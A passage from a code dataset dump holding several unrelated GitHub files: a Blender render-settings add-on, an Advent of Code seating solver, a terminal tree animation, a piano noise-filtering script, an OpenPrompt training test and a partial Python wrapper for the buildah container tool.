cy.aa_samples,\n \"preview_aa_samples\": cy.preview_aa_samples,\n \"sample_all_lights_direct\": cy.sample_all_lights_direct,\n \"sample_all_lights_indirect\": cy.sample_all_lights_indirect,\n \"sampling_pattern\": cy.sampling_pattern,\n \n \"samples\": cy.samples,\n \"preview_samples\": cy.preview_samples,\n \n \"diffuse_samples\": cy.diffuse_samples,\n \"glossy_samples\": cy.glossy_samples,\n \"transmission_samples\": cy.transmission_samples,\n \"ao_samples\": cy.ao_samples,\n \"mesh_light_samples\": cy.mesh_light_samples,\n \"subsurface_samples\": cy.subsurface_samples,\n \"volume_samples\": cy.volume_samples,\n \n #geometry\n \"volume_step_size\": cy.volume_step_size,\n \"volume_max_steps\": cy.volume_max_steps,\n \n \"use_curves\": cu.use_curves,\n \n \"primitive\": cu.primitive,\n \"shape\": cu.shape,\n \"cull_backfacing\": cu.cull_backfacing,\n \"minimum_width\": cu.minimum_width,\n \"maximum_width\": cu.maximum_width,\n \"subdivisions\": cu.subdivisions,\n \n #light path\n \"transparent_max_bounces\": cy.transparent_max_bounces,\n \"transparent_min_bounces\": cy.transparent_min_bounces,\n \"use_transparent_shadows\": cy.use_transparent_shadows,\n \"caustics_reflective\": cy.caustics_reflective,\n \"caustics_refractive\": cy.caustics_refractive,\n \"blur_glossy\": cy.blur_glossy,\n \"max_bounces\": cy.max_bounces,\n \"min_bounces\": cy.min_bounces,\n \"diffuse_bounces\": cy.diffuse_bounces,\n \"diffuse_bounces\": cy.diffuse_bounces,\n \"transmission_bounces\": cy.transmission_bounces,\n \"volume_bounces\": cy.volume_bounces,\n \n #motion blur\n \"use_motion_blur\": rd.use_motion_blur,\n \"motion_blur_position\": cy.motion_blur_position,\n \"rolling_shutter_type\": cy.rolling_shutter_type,\n \"rolling_shutter_duration\": cy.rolling_shutter_duration,\n \n #film\n \"film_exposure\": cy.film_exposure,\n \"film_transparent\": cy.film_transparent,\n \"pixel_filter_type\": cy.pixel_filter_type,\n \"filter_width\": cy.filter_width,\n \n #performance\n \"threads_mode\": rd.threads_mode,\n \"threads\": rd.threads,\n \"tile_order\": cy.tile_order,\n #\"tile_x\": rd.tile_x,\n #\"tile_y\": rd.tile_y,\n \"use_progressive_refine\": cy.use_progressive_refine,\n \"use_save_buffers\": rd.use_save_buffers,\n \"debug_bvh_type\": cy.debug_bvh_type,\n \"preview_start_resolution\": cy.preview_start_resolution,\n \"use_persistent_data\": rd.use_persistent_data,\n \"debug_use_spatial_splits\": cy.debug_use_spatial_splits,\n \"debug_use_hair_bvh\": cy.debug_use_hair_bvh,\n \"debug_bvh_time_steps\": cy.debug_bvh_time_steps,\n \n #post processing\n \"use_compositing\": rd.use_compositing,\n \"use_sequencer\": rd.use_sequencer,\n \"dither_intensity\": rd.dither_intensity,\n \n },\n }\n return datas\n\n#apply render settings from json data set\ndef apply_render_settings_from_dataset(datas):\n scene=bpy.context.scene\n rd=scene.render\n im=rd.image_settings\n cy=scene.cycles\n cu=scene.cycles_curves\n\n #render\n cy.feature_set=datas['settings'][\"feature_set\"]\n #cy.device=datas['settings'][\"device\"]\n cy.shading_system=datas['settings'][\"shading_system\"]\n \n #dimensions\n rd.resolution_x=datas['settings'][\"resolution_x\"]\n rd.resolution_y=datas['settings'][\"resolution_y\"]\n rd.resolution_percentage=datas['settings'][\"resolution_percentage\"]\n \n #output\n rd.use_overwrite=datas['settings'][\"use_overwrite\"]\n rd.use_placeholder=datas['settings'][\"use_placeholder\"]\n rd.use_file_extension=datas['settings'][\"use_file_extension\"]\n rd.use_render_cache=datas['settings'][\"use_render_cache\"]\n im.file_format=datas['settings'][\"file_format\"]\n im.color_mode=datas['settings'][\"color_mode\"]\n im.color_depth=datas['settings'][\"color_depth\"]\n im.exr_codec=datas['settings'][\"exr_codec\"]\n im.compression=datas['settings'][\"compression\"]\n \n #sampling\n cy.progressive=datas['settings'][\"progressive\"]\n \n cy.use_square_samples=datas['settings'][\"use_square_samples\"]\n cy.seed=datas['settings'][\"seed\"]\n cy.use_animated_seed=datas['settings'][\"use_animated_seed\"]\n cy.sample_clamp_direct=datas['settings'][\"sample_clamp_direct\"]\n cy.sample_clamp_indirect=datas['settings'][\"sample_clamp_indirect\"]\n cy.light_sampling_threshold=datas['settings'][\"light_sampling_threshold\"]\n cy.aa_samples=datas['settings'][\"aa_samples\"]\n cy.preview_aa_samples=datas['settings'][\"preview_aa_samples\"]\n cy.sample_all_lights_direct=datas['settings'][\"sample_all_lights_direct\"]\n cy.sample_all_lights_indirect=datas['settings'][\"sample_all_lights_indirect\"]\n cy.sampling_pattern=datas['settings'][\"sampling_pattern\"]\n \n cy.samples=datas['settings'][\"samples\"]\n cy.preview_samples=datas['settings'][\"preview_samples\"]\n \n cy.diffuse_samples=datas['settings'][\"diffuse_samples\"]\n cy.glossy_samples=datas['settings'][\"glossy_samples\"]\n cy.transmission_samples=datas['settings'][\"transmission_samples\"]\n cy.ao_samples=datas['settings'][\"ao_samples\"]\n cy.mesh_light_samples=datas['settings'][\"mesh_light_samples\"]\n cy.subsurface_samples=datas['settings'][\"subsurface_samples\"]\n cy.volume_samples=datas['settings'][\"volume_samples\"]\n \n #geometry\n cy.volume_step_size=datas['settings'][\"volume_step_size\"]\n cy.volume_max_steps=datas['settings'][\"volume_max_steps\"]\n \n cu.use_curves=datas['settings'][\"use_curves\"]\n \n cu.primitive=datas['settings'][\"primitive\"]\n cu.shape=datas['settings'][\"shape\"]\n cu.cull_backfacing=datas['settings'][\"cull_backfacing\"]\n cu.minimum_width=datas['settings'][\"minimum_width\"]\n cu.maximum_width=datas['settings'][\"maximum_width\"]\n cu.subdivisions=datas['settings'][\"subdivisions\"]\n \n #light path\n cy.transparent_max_bounces=datas['settings'][\"transparent_max_bounces\"]\n cy.transparent_min_bounces=datas['settings'][\"transparent_min_bounces\"]\n cy.use_transparent_shadows=datas['settings'][\"use_transparent_shadows\"]\n cy.caustics_reflective=datas['settings'][\"caustics_reflective\"]\n cy.caustics_refractive=datas['settings'][\"caustics_refractive\"]\n cy.blur_glossy=datas['settings'][\"blur_glossy\"]\n cy.max_bounces=datas['settings'][\"max_bounces\"]\n cy.min_bounces=datas['settings'][\"min_bounces\"]\n cy.diffuse_bounces=datas['settings'][\"diffuse_bounces\"]\n cy.diffuse_bounces=datas['settings'][\"diffuse_bounces\"]\n cy.transmission_bounces=datas['settings'][\"transmission_bounces\"]\n cy.volume_bounces=datas['settings'][\"volume_bounces\"]\n \n #motion blur\n rd.use_motion_blur=datas['settings'][\"use_motion_blur\"]\n cy.motion_blur_position=datas['settings'][\"motion_blur_position\"]\n cy.rolling_shutter_type=datas['settings'][\"rolling_shutter_type\"]\n cy.rolling_shutter_duration=datas['settings'][\"rolling_shutter_duration\"]\n \n #film\n cy.film_exposure=datas['settings'][\"film_exposure\"]\n cy.film_transparent=datas['settings'][\"film_transparent\"]\n cy.pixel_filter_type=datas['settings'][\"pixel_filter_type\"]\n cy.filter_width=datas['settings'][\"filter_width\"]\n \n #performance\n rd.threads_mode=datas['settings'][\"threads_mode\"]\n rd.threads=datas['settings'][\"threads\"]\n cy.tile_order=datas['settings'][\"tile_order\"]\n #rd.tile_x=datas['settings'][\"tile_x\"]\n #rd.tile_y=datas['settings'][\"tile_y\"]\n cy.use_progressive_refine=datas['settings'][\"use_progressive_refine\"]\n rd.use_save_buffers=datas['settings'][\"use_save_buffers\"]\n cy.debug_bvh_type=datas['settings'][\"debug_bvh_type\"]\n cy.preview_start_resolution=datas['settings'][\"preview_start_resolution\"]\n rd.use_persistent_data=datas['settings'][\"use_persistent_data\"]\n cy.debug_use_spatial_splits=datas['settings'][\"debug_use_spatial_splits\"]\n cy.debug_use_hair_bvh=datas['settings'][\"debug_use_hair_bvh\"]\n cy.debug_bvh_time_steps=datas['settings'][\"debug_bvh_time_steps\"]\n \n #post processing\n rd.use_compositing=datas['settings'][\"use_compositing\"]\n rd.use_sequencer=datas['settings'][\"use_sequencer\"]\n rd.dither_intensity=datas['settings'][\"dither_intensity\"]\n","repo_name":"samytichadou/ND_addon_blender","sub_path":"render_settings_functions.py","file_name":"render_settings_functions.py","file_ext":"py","file_size_in_byte":10447,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"42043985148","text":"from itertools import permutations\n\nscores = {}\nbestScore = 0\n\ndef calculateScore(order):\n total = 0\n for i in range(len(order)):\n total += int(scores[order[i]][order[(i+1)%len(order)]])\n total += int(scores[order[i]][order[(i-1)%len(order)]])\n return total\n\nwith open(\"Input\") as inFile:\n lines = inFile.readlines()\n\n for line in lines:\n parts = line.split()\n if parts[0] not in scores:\n scores[parts[0]] = {}\n scores[parts[0]][parts[10][:-1]] = parts[3] if parts[2] == 'gain' else int(parts[3]) * -1\n\n for perm in permutations(scores):\n score = calculateScore(perm)\n bestScore = max(score, bestScore)\n\n print(\"Part 1:\", bestScore)\n\n scores[\"me\"] = {}\n for score in scores:\n if score != \"me\":\n scores[score][\"me\"] = 0\n scores[\"me\"][score] = 0\n\n bestScore = 0\n for perm in permutations(scores):\n score = calculateScore(perm)\n bestScore = max(score, bestScore)\n\n print(\"Part 2:\", bestScore)","repo_name":"danksalot/AdventOfCode","sub_path":"2015/Day13/Program.py","file_name":"Program.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70431091292","text":"from random import randint\nfrom time import sleep\nrnd2 = randint(1,30)\ncolor=0\ndef gentree():\n print(\"\\033c\",\"\\033[0m\")\n for x in range(1,23):\n rnd1 = randint(1,rnd2)\n color=randint(0,1)\n if x==1:\n ch=\"$\"\n elif rnd1%4==0:\n ch=\"o\"\n elif rnd1%3==0:\n ch=\"i\"\n else:\n ch=\"*\"\n #if color == 0:\n colors='\\033[1;31m'\n #else:\n colors='\\033[1;32m'\n\n print(\"{:^33}\".format(ch*x))\n\n print(\"\\033[33m{:^33}\".format(\"|||\"))\n print(\"{:^33}\\033[0m\".format(\"|||\"))\n sleep(.75)\nwhile True:\n gentree()\n","repo_name":"rsd1244/python","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12280619936","text":"from scipy.fftpack import fft\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sounddevice as sd\n\n\n#setting number of samples and frequency axis range\nN = 3*1024\nf = np.linspace(0,512,int(N/2))\n\nt= np.linspace(0,3,12*1024)\n\n#generating noise signal using random frequencies \nf_n = np.random.randint(0,512,2) \nnoise = np.sin(2*np.pi*f_n[0]*t) + np.sin(2*np.pi*f_n[1]*t)\n\n\n\n#array storing third octave frequencies\nthird_octave_freq = [196,146.83,196,246.93,196,146.83]\n#array storing fourth octave frequencies\nfourth_octave_freq = [392,493.88,261.63,293.66,392,493.88]\n#array storing varying time intervals between notes\ntime_between_notes = [0.2,0.1,0.3,0.2,0.1]\n#array storing the value of each note endpoint\nend_point= [0.4,0.9,1.5,2,2.4,3]\n#variable storing each note startpoint\ni= 0\n#final signal summing all song notes\nx=0\n#counter for endpoint and frequency arrays\nn =0\n#counter for time_between_notes array\nl=0\n\n\n##looping over the 3 second duration, each time creating two signals\n##and summing them to the final signal\n##updating counters and checking condition to exit the loop\nwhile i<3 :\n x1=np.where(np.logical_and(t>=i,t<=end_point[n]),np.sin(2*np.pi*third_octave_freq[n]*t),0)\n x2=np.where(np.logical_and(t>=i,t<=end_point[n]),np.sin(2*np.pi*fourth_octave_freq[n]*t),0)\n x = x+x1+x2\n if l == 5:\n break\n i = (end_point[n]+time_between_notes[l])\n n = n+1\n l = l+1\n\n\n#converting original time signal to frequency signal\nx_f = fft(x)\nx_f = 2/N * np.abs(x_f[0:int(N/2)])\n\n#adding generated noise to original signal and getting its corresponding signal in frequency domain\nx_n = x + noise\nx_nf = fft(x_n)\nx_nf = 2/N * np.abs(x_nf[0:int(N/2)])\n\n\n#using array to store the noise frequencies founnd in the signal\nf_found= np.arange(0,2)\n#looping over the frequency range to find the noise frequencies and stroing them in the array\nj =0\ntemp = 0 ;\nmaxAmplitude = np.ceil(max(x_f))\nwhile j < f.size :\n if x_nf[j] >maxAmplitude :\n f_found[temp]=f[j]\n temp +=1\n j +=1\n \n#rounding frequencies since we use integer values and then removing the noise to get the filtered signal\nf_found[0] = np.round(f_found[0])\nf_found[1] = np.round(f_found[1])\nx_filtered = x_n - ( np.sin(2*f_found[0]*np.pi*t)+np.sin(2*f_found[1]*np.pi*t) )\n\n#converting filtered time signal to frequency signal\nx_fil_fft = fft(x_filtered)\nx_fil_fft = 2/N * np.abs(x_fil_fft[0:int(N/2)])\n\n\n#plotting all grapghs\nplt.subplot(3,2,1)\nplt.plot(t,x)\nplt.subplot(3,2,2)\nplt.plot(f,x_f)\nplt.subplot(3,2,3)\nplt.plot(t,x_n)\nplt.subplot(3,2,4)\nplt.plot(f,x_nf)\nplt.subplot(3,2,5)\nplt.plot(t,x_filtered)\nplt.subplot(3,2,6)\nplt.plot(f,x_fil_fft)\n\n\n\nsd.play(x_filtered,3*1024)\n\n\n\n\n","repo_name":"AdhamAllamx/Noise_Cancelation_Piano","sub_path":"Noise_Cancelltion_Piano.py","file_name":"Noise_Cancelltion_Piano.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10813975447","text":"\"\"\"Test some code snippets\"\"\"\nimport os\nimport torch\nfrom loguru import logger\nfrom openprompt.plms import load_plm\nfrom openprompt.prompts import ManualTemplate\nfrom openprompt.prompts import ManualVerbalizer\nfrom openprompt import PromptForClassification\nfrom openprompt.data_utils import InputExample\nfrom openprompt import PromptDataLoader\nfrom openprompt.data_utils import InputFeatures\nfrom utils import pickle_read\nfrom torch.utils.data import (DataLoader, RandomSampler, SequentialSampler,\n TensorDataset)\n\n\n# class CoLAPromptTemple(object):\n# def __init__(self, data_path):\n# self.data_path = data_path\n\n\n# dataset = [ # For simplicity, there's only two examples\n# # text_a is the input text of the data, some other datasets may have multiple input sentences in one example.\n# InputExample(\n# guid=0,\n# text_a=\"Albert Einstein was one of the greatest intellects of his time.\",\n# ),\n# InputExample(\n# guid=1,\n# text_a=\"The film was badly made.\",\n# ),\n# ]\n\nclass MyManualTemplate(ManualTemplate):\n def wrap_one_example(self,\n example: InputExample):\n if self.text is None:\n raise ValueError(\"template text has not been initialized\")\n\n text = self.incorporate_text_example(example)\n\n # not_empty_keys = example.keys()\n not_empty_keys = [key for key in example.__dict__.keys() if getattr(example, key) is not None]\n for placeholder_token in self.placeholder_mapping:\n not_empty_keys.remove(self.placeholder_mapping[placeholder_token]) # placeholder has been processed, remove\n if \"meta\" in not_empty_keys:\n not_empty_keys.remove('meta') # meta has been processed\n\n keys, values = ['text'], [text]\n for inputflag_name in self.registered_inputflag_names:\n keys.append(inputflag_name)\n v = None\n if hasattr(self, inputflag_name) and getattr(self, inputflag_name) is not None:\n v = getattr(self, inputflag_name)\n elif hasattr(self, \"get_default_\" + inputflag_name):\n v = getattr(self, \"get_default_\" + inputflag_name)()\n setattr(self, inputflag_name, v) # cache\n else:\n raise ValueError(\"\"\"\n Template's inputflag '{}' is registered but not initialize.\n Try using template.{} = [...] to initialize\n or create an method get_default_{}(self) in your template.\n \"\"\".format(inputflag_name, inputflag_name, inputflag_name))\n\n if len(v) != len(text):\n raise ValueError(\"Template: len({})={} doesn't match len(text)={}.\" \\\n .format(inputflag_name, len(v), len(text)))\n values.append(v)\n wrapped_parts_to_tokenize = []\n for piece in list(zip(*values)):\n wrapped_parts_to_tokenize.append(dict(zip(keys, piece)))\n\n wrapped_parts_not_tokenize = {key: getattr(example, key) for key in not_empty_keys}\n return [wrapped_parts_to_tokenize, wrapped_parts_not_tokenize]\n\n\ndef build_dataloader(features, mode=\"train\", model_type=\"roberta\", train_batch_size=5,\n output_mode=\"classification\", tuning_type=\"prompt\"):\n # Convert to Tensors and build dataset\n all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)\n all_attention_mask = torch.tensor([f.attention_mask for f in features], dtype=torch.long)\n\n if model_type not in [\"distilbert\", \"roberta\"]:\n all_token_type_ids = torch.tensor([f.token_type_ids for f in features], dtype=torch.long)\n else:\n # distilbert and roberta don't have token_type_ids\n all_token_type_ids = torch.tensor([f.attention_mask for f in features], dtype=torch.long)\n\n if output_mode == \"classification\":\n all_labels = torch.tensor([f.label for f in features], dtype=torch.long)\n elif output_mode == \"regression\":\n all_labels = torch.tensor([f.label for f in features], dtype=torch.float)\n\n if \"prompt\" in tuning_type:\n all_loss_ids = torch.tensor([f.loss_ids for f in features], dtype=torch.float)\n dataset = TensorDataset(all_input_ids, all_attention_mask, all_token_type_ids, all_labels, all_loss_ids)\n else:\n dataset = TensorDataset(all_input_ids, all_attention_mask, all_token_type_ids, all_labels)\n\n sampler = RandomSampler(dataset) if mode == \"train\" else SequentialSampler(dataset)\n dataloader = DataLoader(dataset, sampler=sampler, batch_size=train_batch_size)\n\n return dataloader\n\n\ndef convert_glue_to_manual_features(samples, prompt_template,\n wrapped_tokenizer, label_list):\n label_map = {label: i for i, label in enumerate(label_list)}\n features = []\n for sample in samples:\n wrapped_example = prompt_template.wrap_one_example(sample)\n tokenized_example = wrapped_tokenizer.tokenize_one_example(\n wrapped_example, teacher_forcing=False)\n feature = InputFeatures(**tokenized_example, **wrapped_example[1])\n feature.label = label_map[feature.label]\n features.append(feature)\n return features\n\n\n# model_inputs = {}\n# for split in ['train', 'valid', 'test']:\n# model_inputs[split] = []\n# for sample in raw_data[split][0:10]:\n# wrapped_example = promptTemplate.wrap_one_example(sample)\n# tokenized_example = wrapped_tokenizer.tokenize_one_example(\n# wrapped_example, teacher_forcing=False)\n# feature = InputFeatures(**tokenized_example, **wrapped_example[1])\n# model_inputs[split].append(feature)\n\ntask_name = \"cola\"\nraw_dataset_path = os.path.join(\"/workspace/data/fedglue/\", f\"{task_name}_data.pkl\")\nraw_data = pickle_read(raw_dataset_path)\n\nplm, tokenizer, model_config, WrapperClass = load_plm(\"roberta\", \"/workspace/pretrain/nlp/roberta-base/\")\n\npromptTemplate = MyManualTemplate(\n # text='{\"placeholder\":\"text_a\"} It was {\"mask\"}',\n text='{\"placeholder\":\"text_a\"} This is {\"mask\"} .',\n tokenizer=tokenizer,\n)\n\nlabel_list = [ # There are two classes in Sentiment Analysis, one for negative and one for positive\n \"0\",\n \"1\"\n]\nlabel_words = {\n \"0\": [\"incorrect\", ],\n \"1\": [\"correct\"],\n}\npromptVerbalizer = ManualVerbalizer(\n classes=label_list,\n label_words=label_words,\n tokenizer=tokenizer,\n)\n\n# wrapped_example = promptTemplate.wrap_one_example(raw_data['train'][0])\n# print(wrapped_example)\n\nwrappedTokenizer = WrapperClass(max_seq_length=128, tokenizer=tokenizer, truncate_method=\"head\")\n\ntrain_features = convert_glue_to_manual_features(\n raw_data[\"train\"],\n prompt_template=promptTemplate,\n wrapped_tokenizer=wrappedTokenizer,\n label_list=label_list\n)\ntrain_data_loader = build_dataloader(train_features)\n\nvalid_features = convert_glue_to_manual_features(\n raw_data[\"valid\"],\n prompt_template=promptTemplate,\n wrapped_tokenizer=wrappedTokenizer,\n label_list=label_list\n)\ntrain_data_loader = build_dataloader(train_features, train_batch_size=32)\nvalid_data_loader = build_dataloader(\n valid_features, mode=\"valid\",\n train_batch_size=32)\n# You can see what a tokenized example looks like by\n# tokenized_example = wrapped_tokenizer.tokenize_one_example(wrapped_example, teacher_forcing=False)\n# print(tokenized_example)\n# print(tokenizer.convert_ids_to_tokens(tokenized_example['input_ids']))\n\n# print(promptVerbalizer.label_words_ids)\n# logits = torch.randn(2, len(tokenizer)) # creating a pseudo output from the plm, and\n# print(promptVerbalizer.process_logits(logits)) # see what the verbalizer do\n\n# model_inputs = {}\n# for split in ['train', 'valid', 'test']:\n# model_inputs[split] = []\n# for sample in raw_data[split][0:10]:\n# wrapped_example = promptTemplate.wrap_one_example(sample)\n# tokenized_example = wrapped_tokenizer.tokenize_one_example(\n# wrapped_example, teacher_forcing=False)\n# feature = InputFeatures(**tokenized_example, **wrapped_example[1])\n# model_inputs[split].append(feature)\n\npromptModel = PromptForClassification(\n template=promptTemplate,\n plm=plm,\n verbalizer=promptVerbalizer,\n freeze_plm=False\n)\nfrom utils import get_parameter_number\n\nprint(get_parameter_number(promptModel))\n#\n# data_loader = PromptDataLoader(\n# dataset=raw_data['train'],\n# # tokenizer=tokenizer,\n# tokenizer_wrapper=wrapped_tokenizer,\n# template=promptTemplate,\n# tokenizer_wrapper_class=WrapperClass,\n# )\n\n\npromptModel = promptModel.cuda()\n\n# Now the training is standard\nfrom transformers import AdamW, get_linear_schedule_with_warmup\n\nnum_train_epochs = 10\nloss_func = torch.nn.CrossEntropyLoss()\nno_decay = ['bias', 'LayerNorm.weight']\n# it's always good practice to set no decay to biase and LayerNorm parameters\noptimizer_grouped_parameters = [\n {'params': [p for n, p in promptModel.named_parameters() if not any(nd in n for nd in no_decay)],\n 'weight_decay': 0.01},\n {'params': [p for n, p in promptModel.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n]\noptimizer = AdamW(optimizer_grouped_parameters, lr=1e-4)\nt_total = len(train_data_loader) * num_train_epochs\nscheduler = get_linear_schedule_with_warmup(\n optimizer, num_warmup_steps=0,\n num_training_steps=t_total\n )\nfor epoch in range(num_train_epochs):\n tot_loss = 0\n for step, batch in enumerate(train_data_loader):\n\n batch = tuple(t.cuda() for t in batch)\n inputs = {'input_ids': batch[0],\n 'attention_mask': batch[1],\n 'label': batch[3],\n 'loss_ids': batch[4]\n }\n\n logits = promptModel(inputs)\n # label_ids = batch[3]\n label_ids = inputs[\"label\"]\n loss = loss_func(logits, label_ids)\n loss.requires_grad_(True)\n loss.backward()\n tot_loss += loss.item()\n optimizer.step()\n scheduler.step()\n optimizer.zero_grad()\n\n print(\"Epoch {}, average loss: {}\".format(epoch, tot_loss / len(train_data_loader)), flush=True)\n\nallpreds = []\nalllabels = []\nfor step, batch in enumerate(valid_data_loader):\n batch = tuple(t.cuda() for t in batch)\n inputs = {'input_ids': batch[0],\n 'attention_mask': batch[1],\n 'label': batch[3],\n 'loss_ids': batch[4]\n }\n logits = promptModel(inputs)\n labels = inputs['label']\n alllabels.extend(labels.cpu().tolist())\n allpreds.extend(torch.argmax(logits, dim=-1).cpu().tolist())\n\nacc = sum([int(i == j) for i, j in zip(allpreds, alllabels)]) / len(allpreds)\nprint(acc)\nfrom sklearn.metrics import matthews_corrcoef\nprint(matthews_corrcoef(alllabels, allpreds))\n\n# promptModel.eval()\n# with torch.no_grad():\n# for batch in data_loader:\n# logits = promptModel(batch)\n# preds = torch.argmax(logits, dim = -1)\n# print(classes[preds])\n\n\n# logger.info(promptModel)\n","repo_name":"SMILELab-FL/FedPETuning","sub_path":"tools/backup/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":11007,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"32"} +{"seq_id":"29798828085","text":"# coding: utf-8\n\nimport os as _os\nimport time as _time\nimport json as _json\nimport shlex as _shlex\nimport operator as _op\nimport subprocess as _sp\nimport logging as _logging\nimport tempfile as _tempfile\nimport contextlib as _contextlib\n\n\n_log = _logging.getLogger()\n\nglobal_options = {}\n#timings = open(\"/tmp/timings\", \"wt\")\n\n\nclass BuildahError(Exception):\n pass\n\n\nclass BuildahNotFound(BuildahError):\n pass\n\n\ndef _optify_key(k):\n if len(k) == 1:\n return \"-{}\".format(k)\n return \"--{}\".format(k.replace(\"_\", \"-\"))\n\n\ndef _split_special(d):\n special = {}\n normal = {}\n for key, value in d.items():\n if key.startswith(\"_\"):\n special[key[1:]] = value\n else:\n normal[key] = value\n return (special, normal)\n\n\ndef _optify(d):\n opts = []\n for key, value in d.items():\n if value is None:\n continue\n key = _optify_key(key)\n if isinstance(value, bool):\n opts.append(key)\n elif isinstance(value, (list, tuple, set)):\n for v in value:\n opts += [key, v]\n else:\n opts += [key, str(value)]\n return opts\n\n\ndef _buildah(subcommand, *args, **kwargs):\n special, options = _split_special(kwargs)\n json_ = special.get(\"json\", False)\n json_flag = special.get(\"json_flag\", True)\n list_ = special.get(\"list\", False)\n wrapper = special.get(\"wrapper\")\n capture_output = special.get(\"capture_output\", json_ or list_ or wrapper)\n\n if not wrapper:\n wrapper = lambda x: x\n\n if json_ and json_flag:\n options[\"json\"] = True\n\n cmd = (\n [\"buildah\"]\n + _optify(global_options)\n + [subcommand]\n + _optify(options)\n + list(args)\n )\n\n print(\"Running {}\".format(\" \".join([str(_).strip() for _ in cmd])))\n t_start = _time.time()\n result = _sp.run(cmd, stdout=_sp.PIPE if capture_output else None, stderr=_sp.PIPE, text=True)\n if result.returncode != 0:\n raise BuildahError(result.stderr)\n #timings.write(_json.dumps({\"subcommand\": str(subcommand), \"options\": options, \"args\": [str(_) for _ in args], \"duration\": _time.time() - t_start}) + \"\\n\")\n if json_:\n result = _json.loads(result.stdout)\n elif capture_output:\n result = result.stdout\n\n if list_:\n # Handle \"null\" return string, the \"containers\" subcommand\n # returns \"null\" instead of \"[]\" when there are no containers\n return [wrapper(_) for _ in result or []]\n\n if capture_output:\n return wrapper(result)\n\n return result\n\n\nclass ConfigurableSet(set):\n\n def __init__(self, name_or_id, option, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._option = option\n self._name_or_id = name_or_id\n\n def add(self, value):\n config(self._name_or_id, **{self._option: value})\n return super().add(value)\n\n def discard(self, value):\n config(self._name_or_id, **{self._option: f\"{value}-\"})\n return super().discard(value)\n\n\nclass ConfigurableMapping(dict):\n\n def __init__(self, name_or_id, option, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._name_or_id = name_or_id\n self._option = option\n\n def __setitem__(self, name, value):\n config(self._name_or_id, **{self._option: {name: value}})\n return super().__setitem__(name, value)\n\n def __delitem__(self, name):\n config(self._name_or_id, **{self._option: {name: None}})\n return super().__delitem__(name)\n\n\nclass Info:\n\n def __init__(self, name, reader):\n self.name = name\n self._reader = reader\n\n def __get__(self, obj, objtype):\n if self.name not in obj._cache:\n obj._cache[self.name] = self._reader(obj.info)\n return obj._cache[self.name]\n\n\nclass Configurable(Info):\n\n def __set__(self, obj, val):\n obj._cache[self.name] = val\n config(obj.id, **{self.name: val})\n\n\nclass Inspectable:\n\n _TYPE = None\n\n def __init__(self, name_or_id):\n self._name_or_id = name_or_id\n self.info = None\n self._cache = dict()\n self.refresh()\n\n def inspect(self):\n return inspect(self._name_or_id, type=self._TYPE)\n\n def refresh(self):\n self.info = self.inspect()\n\n\nclass Image(Inspectable):\n\n _TYPE = \"image\"\n id = Info(\"id\", _op.itemgetter(\"FromImageID\"))\n name = Info(\"name\", _op.itemgetter(\"FromImage\"))\n digest = Info(\"digest\", _op.itemgetter(\"FromImageDigest\"))\n\n def rm(self):\n return rmi(self.id)\n\n def push(self, destination):\n return push(self.id, destination)\n\n def pull(self):\n return pull(self.id)\n\n def tag(self, *aliases):\n return tag(self.id, *aliases)\n\n\nclass Container(Inspectable):\n\n _TYPE = \"container\"\n _config = None\n\n id = Info(\"id\", lambda x: x[\"ContainerID\"])\n name = Info(\"name\", lambda x: x[\"Container\"])\n annotations = Configurable(\"annotation\", _op.itemgetter(\"ImageAnnotations\"))\n cmd = Configurable(\"cmd\", lambda x: x[\"OCIv1\"][\"config\"].get(\"Cmd\", []) or [])\n entrypoint = Configurable(\n \"entrypoint\",\n lambda x: x[\"OCIv1\"][\"config\"].get(\"Entrypoint\", []) or [],\n )\n port = Configurable(\"port\", lambda x: list(x[\"OCIv1\"][\"config\"].get(\"ExposedPorts\", {}).keys()))\n imageid = Info(\"imageid\", _op.itemgetter(\"FromImageID\"))\n env = Configurable(\n \"env\",\n lambda x: ConfigurableMapping(\n x[\"ContainerID\"],\n \"env\",\n dict(_.split(\"=\", 1) for _ in x[\"OCIv1\"][\"config\"].get(\"Env\", [])),\n ),\n )\n labels = Configurable(\n \"label\",\n lambda x: ConfigurableMapping(\n x[\"ContainerID\"],\n \"label\",\n x[\"OCIv1\"][\"config\"].get(\"Labels\", {}) or {},\n ),\n )\n workingdir = Configurable(\"workingdir\", lambda x: x[\"Config\"][\"config\"][\"WorkingDir\"])\n user = Configurable(\"user\", lambda x: x[\"Config\"][\"config\"][\"User\"])\n arch = Configurable(\"arch\", lambda x: x[\"Config\"][\"architecture\"])\n os = Configurable(\"os\", lambda x: x[\"Config\"][\"os\"])\n author = Configurable(\"author\", lambda x: x[\"OCIv1\"].get(\"author\"))\n volumes = Configurable(\n \"volume\",\n lambda x: ConfigurableSet(\n x[\"ContainerID\"],\n \"volume\", \n (x[\"OCIv1\"][\"config\"].get(\"Volumes\") or {}).keys(),\n ),\n )\n onbuild = Configurable(\"onbuild\", lambda x: x[\"Config\"].get(\"OnBuild\"))\n stop_signal = Configurable(\"stop_signal\", lambda x: x[\"OCIv1\"][\"config\"].get(\"StopSignal\"))\n\n def __init__(self, name_or_id=None, base=None):\n if name_or_id is None and base is None:\n raise RuntimeError(\"You need to either pass an existing image name or a base image to create a new container from\")\n\n if base is not None:\n name_or_id = from_(base, _wrapper=str, name=name_or_id)\n\n super().__init__(name_or_id)\n\n def rmi(self, **options):\n return rmi(self.imageid, **options)\n\n def rm(self, **options):\n return rm(self.id, **options)\n\n def add(self, source, *args, **options):\n return add(self.id, source, *args, **options)\n\n def add_contents(self, contents, *args, mode=None, **options):\n with _tempfile.NamedTemporaryFile() as f:\n if mode is not None:\n _os.fchmod(f.fileno(), mode)\n f.write(contents)\n f.flush()\n return add(self.id, f.name, 